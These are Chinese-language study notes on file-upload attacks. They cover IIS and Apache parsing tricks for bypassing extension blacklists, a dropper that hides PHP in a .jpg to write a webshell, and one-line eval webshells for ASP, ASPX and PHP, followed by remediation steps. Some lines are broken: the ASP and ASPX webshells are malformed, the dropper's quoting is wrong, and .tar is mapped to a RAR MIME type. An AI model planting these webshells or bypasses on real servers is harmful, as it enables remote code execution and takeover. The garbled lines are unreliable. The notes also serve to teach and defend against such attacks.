上传漏洞
常见中间件
IIS
解析漏洞:
目录解析(IIS 5.x/6.0)
/xx.asp/xx.jpg 将jpg按照asp解析
/xx.asp/xx.*
文件解析
xx.asp;.jpg 分号前的后缀视为不见
默认解析(IIS 6.0) 黑名单是可能被忽略
/wooyun.asa 进行访问
/wooyun.cer 进行访问
/wooyun.cdx 对文件的下载(和浏览器有关,QQ浏览器可以解析)
畸形解析(IIS 7.0/7.5)
备注:可以在url目录遍历中发现有fckeditor即可判断有上传权限,可以尝试上传漏洞攻击
利用条件:
Fast-CGI开启 黑盒只管尝试
phpinfo.php 可以看
1.上传sp.jpg,内容为:
<?php fputs(fopen('shell.php','w')
,<?php eval($_POST[cmd])?>');?>
2.访问sp.jpg,在这个目录下就会生成一句话木马shell.php
3.最后再拿软件连接后台
Nginx 加载java代码
Apache 加载php
解析漏洞:
原理:从右到左开始判断解析,如果识别不可解析,就再往左判断
Apache解析后缀phtml,pht,php3,php4和php5,,都是按照php解析(这些上传都可以绕过黑名单)
weblogic
一句话木马:
asp: <%eval request("pass)%>
aspx: <%@ Page Language%><%eval(Request.Item["pass"]."unsafe):%>
php: <?php @eval($_POST['pass']);?>
MIME:
常见类型:
JPEG类型 image/jpeg .jpeg/.jpg
超文本标记语言 .html/.htm text/html
TAR文件 .tar application/x-rar
下载文件类型 .exe application/octet-stream
修复方案:
1.白名单检查文件扩展名,不属于白名单内的,不允许上传
2.上传文件的保存目录不可解析jsp,php等脚本语言
apache:
1.找到配置文件httpd.conf
2.<Directory "c:/wwwroot/shangchaun/upload">
AllowOverride None
Options None
Order allow,deny
Deny from all
</Directory>
3.重启apache服务
3.文件名随机命名,不允许用户自定义